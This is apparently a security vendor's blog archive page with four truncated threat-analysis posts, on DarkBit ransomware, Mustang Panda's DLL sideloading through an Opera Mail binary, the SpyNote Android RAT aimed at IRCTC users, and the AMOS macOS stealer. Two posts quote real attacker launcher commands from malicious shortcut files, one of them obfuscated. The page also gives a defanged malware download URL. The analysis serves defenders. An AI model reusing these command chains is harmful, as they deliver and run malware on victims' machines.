Posts

Showing posts from May, 2023

MuddyWater Back with DarkBit

  Recently, we came across a tweet about DarkBit ransomware. An Iranian APT group, named MuddyWater, is reportedly behind the DarkBit ransomware. In this blog we will explore the ransomware’s initial access method, the use of Cobalt Strike and the final ransomware payload. Initial Access Method The initial lure was delivered as an ISO file. Figure 1 – ISOFile The payload included a shortcut file (with a .doc extension) and a zip file. Figure 2 – Contents Inside ISO File The shortcut was using PrintBrm.exe to unpack the HR-Update.zip and run it as shown below. PrintBrm.exe is a windows inbuilt command line tool . Figure 3 – Shortcut File cmd.exe /c xcopy .\HR-Update.zip %TEMP% /h /y && PrintBrm.exe -r -f %TEMP%\HR-Update.zip -d %TEMP%\unzip & %TEMP%\unzip\HR-Update.exe Figure 4 – HR-Update.exe Running HR-Update.exe was a Cobalt Strike beacon. Cobalt Strike, a penetration testing tool, can also be used by attackers for gaining a foothold in the system. The final ran...

Mustang Panda – PE Injection through Opera Mail

Image
We came across a tweet where Mustang Panda APT abuses an Opera Mail binary to sideload a malicious dll and then inject malicious code into an mshta.exe process. Initial vector for this infection chain is a .rar file named as lydwcb.rar1, which contains a crafted LNK file that is named “2023 03 26 Vonulásos gyűlés — Körjegyzék” which translates to ‘March meeting — Circular list’. It mimics a shortcut to a PDF to deceive users. The lnk file has a size of around 8KB, in the properties view we can see cmd.exe in the target path. Only upto 255 bytes of content can be viewed in the target path. The actual content can be seen in the below image. “ /c bdeuri&bootstart&cmd /c ___\ ##\___\##\operamail.exe||(forfiles /^P %USERPROFILE%\ /S /^M "2023 03 26 Vonulásos gyűlés - Körjegyzék.rar" /C "cmd /^c &iDj&cmd /c (c:\progra~1\wi^nrar\winr^ar x -id -o+ @path ||pfUY||c:\progra~2\winr^ar\winra^r x -id -o+ @path ||c:\progra~1\7-Zip\7^z x -y -aoa @path ||fBF||c:\progra~2\...

SpyNote targets IRCTC users

Image
  SpyNote targets IRCTC users We at K7 Labs, recently came across an email message as shown in Figure 1, from Indian Railway Catering and Tourism Corporation (IRCTC) about SpyNote , an Android RAT targeting IRCTC users. This spyware is not only used to steal users’ sensitive information but can also spy on a user’s location or remotely control the victims’ device. Let’s now get into the details of how this SpyNote works. This RAT is propagated via WhatsApp with the malicious link https://irctc[.]creditmobile[.]site/irctcconnect[.]apk Once the user falls prey to this RAT and installs this malicious “irctcconnect.apk”, this app pretends to be the genuine IRCTC icon in the device app drawer as shown in Figure 2. Once this RAT is installed on the device, it frequently brings up the Accessibility Service setting option on the device, as shown in Figure 3, until the user eventually allows this app to have the Accessibility Service enabled. Technical Analysis With the necessary perm...

AMOS (MacOS Stealer)

  In the last week of April 2023, it was reported on twitter , that through a telegram channel a new malware was being offered as “Atomic MacOS Stealer”. Many samples of this malware were found on the internet. Figure 1 – Atomic MacOS Stealer Most of these samples were masquerading as an installer of various applications like Tor browser, Photoshop CC, Notion, FL studio. Figure 2 – Amos DMGfiles masquerading as different applications These are delivered as a DMGfile(Disk Image) which is the common format for software distribution & installation packages on macOS. We identified the Tor browser DMG file for the analysis. When we execute the DMG file it gets mounted and we can see the resulting window advises the user to execute the application by right clicking. Figure 3 – Tor Browser These fake applications are created by using Appify , which is used to create applications just by having the executable alone. The icons can be customised. That’s why these applications are in dif...